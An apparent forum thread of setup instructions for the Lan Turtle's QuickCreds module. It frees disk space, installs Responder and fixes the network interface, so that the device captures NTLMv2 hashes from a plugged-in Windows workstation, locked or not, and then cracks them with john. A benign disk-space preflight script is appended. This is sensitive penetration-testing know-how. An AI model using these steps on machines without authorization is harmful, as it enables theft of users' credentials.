
Fixing the Lan Turtle disk space issue with QuickCreds, no SD card


panadero


After much chagrin and googling, we found that QuickCreds will not work on the lan turtle because of disk space issues.  Here's our fix!

(we take no responsibility if you break something/somebody.  Only hack when you have prior approval and authorization!)

Factory reset, or push the turtle-5.bin firmware to reset  (probably need to upgrade to v5 anyway).  This makes sure you are set to base.  YMMV.
Open the lan turtle, push and hold the reset button for at least 5 seconds after plugging it into the machine
ssh in to 172.16.84.1, sh3llz, change password
Update the modules list
Only install QuickCreds for now, so we have enough space
Select QuickCreds and configure
Let it install its dependencies
You can now set QuickCreds to 'Enable' so that it will start at boot
DO NOT REBOOT YET!
At this point, we're going to exit and git clone the responder package
DO NOT INSTALL RESPONDER FROM THE TURTLE MODULES LIST ITSELF
 
Exit 'turtle' back to a basic root shell
Git clone the Responder package first to /tmp since there is plenty of space. 
    git clone git://github.com/lgandx/Responder /tmp/Responder
BUT DON'T REBOOT YET, CAUSE YOU'LL LOSE EVERYTHING IN /tmp
    du -sh /tmp/Responder
        3.8M
    rm -rf /tmp/Responder/.git
    rm -rf /tmp/Responder/tools/MultiRelay/
    du -sh /tmp/Responder
        450.5k
We also want to remove the git package as it takes up >1MB of space.  QuickCreds installs it /only/ to git the Responder package  😕
    opkg remove git
    df -h
        1.2M available on /
Move the Responder package back to /etc/turtle/ for QuickCreds to find it
    mv /tmp/Responder/ /etc/turtle/
    df -h
        1.1M still available on / now  (w00t)
 
The QuickCreds module is hardcoded to use br-lan as the interface.  This doesn't exist, so we need to change it to eth0.  Another 😕
    sed -i 's/br-lan/eth0/' /etc/turtle/modules/QuickCreds
 
You should now have at least 1MB of storage on / and plenty of space for /root/loot to write to, as well as have Responder available for QuickCreds
Pop the turtle in a Windows system and wait about 30 seconds until the amber light goes solid, CREDS!!!
Copy and paste the hash from /root/loot/#/HTTP-NTLMv2-172.16.84.127.txt
Paste into a hash file and send it to john with a wordlist
    john hash.txt --wordlist=wordlist.txt
 
Testing shows this works whether the laptop is locked or not locked.
These hashes cannot be replayed, only cracked.
You still have plenty of space to return to the turtle shell and install any other modules you need at this point.
You may need git for something else, but probably not enough space.
This set up is for the "Grab creds from a locked Workstation" scenario.  You may need MultiRelay for something else...?  Not needed for QuickCreds.
 
ENJOY!

  • 11 months later...

I have an original Lan Turtle with no SD card. I just updated to the 6.2 firmware, and found that Quick Creds acted like it was working, but the folders (e.g. ~/loot/1/) were empty. This post solved the issue. For anyone looking at this later, there are a few minor adjustments:

I did stay on 6.2 firmware (didn't factory reset to 5)

When I got to "git clone git://github.com/lgandx/Responder /tmp/Responder", I didn't have git, and git wouldn't install due to lack of space. Instead I went to https://github.com/lgandx/Responder/releases, copied the tar.gz link to the latest release, and then on my Lan Turtle did "wget https://github.com/lgandx/Responder/archive/v3.0.0.0.tar.gz" while inside /tmp/

I un-tared this, and then more or less continued with the instructions. There was no .git directory to remove, but I did remove /tools/MultiRelay, and of course I never had to opkg remove git.

When it came time to move /tmp/Responder to /etc/turtle/, I was told that the Responder folder (/etc/turtle/Responder) already existed. It appears that they may have somewhat fixed the dependencies? Still, it hadn't worked, so I removed it (rm -rf /etc/turtle/Responder), and copied my up-to-date version over it.

Moving on, /etc/turtle/modules/QuickCreds has been renamed with lowercase characters (/etc/turtle/modules/quickcreds). So sed -i 's/br-lan/eth0/' /etc/turtle/modules/quickcreds

Looking back on it, since the dependencies may have been fixed, I wonder if replacing br-lan with eth0 was the only thing that needed to be done? Still, it's working now, so I'm not messing with it.
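
Both posts move the trimmed Responder tree from /tmp onto the small root filesystem after checking space by eye with du and df, and the second post also ran into an existing /etc/turtle/Responder. As an added example (not part of either post or of the Lan Turtle firmware), here is that check as a POSIX shell preflight; the function names and the 256 KB margin are assumptions, and it assumes the device's du and df accept -sk and -Pk.

```shell
#!/bin/sh
# Added example: preflight before moving a tree from tmpfs (/tmp) onto a
# small flash filesystem. Function names and the default 256 KB margin are
# assumptions, not part of the Lan Turtle firmware.

# Size of a directory tree in KB; prints nothing if the path is unreadable.
tree_kb() {
    du -sk "$1" 2>/dev/null | awk '{print $1}'
}

# Available KB on the filesystem that holds a path (POSIX df layout).
avail_kb() {
    df -Pk "$1" 2>/dev/null | awk 'NR==2 {print $4}'
}

# fits_with_margin SRC DEST_DIR [MARGIN_KB]
# 0: SRC fits and MARGIN_KB stays free; 1: too big; 2: a path is unreadable.
fits_with_margin() {
    src=$1; dest=$2; margin=${3:-256}
    need=$(tree_kb "$src")
    free=$(avail_kb "$dest")
    [ -n "$need" ] && [ -n "$free" ] || return 2
    [ $((need + margin)) -le "$free" ]
}

# safe_move SRC DEST_DIR [MARGIN_KB]
# Refuses (3) if DEST_DIR/<name> already exists, refuses (1) if space is short.
safe_move() {
    src=${1%/}; dest=$2; margin=${3:-256}
    target="$dest/$(basename "$src")"
    if [ -e "$target" ]; then
        echo "refusing: $target already exists" >&2
        return 3
    fi
    if ! fits_with_margin "$src" "$dest" "$margin"; then
        echo "refusing: not enough space on $dest (or path unreadable)" >&2
        return 1
    fi
    mv "$src" "$dest/"
}
```

With these functions loaded, the move step from the posts would be `safe_move /tmp/Responder /etc/turtle`, which stops instead of filling / or silently nesting into an existing Responder directory.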


Archived

This topic is now archived and is closed to further replies.
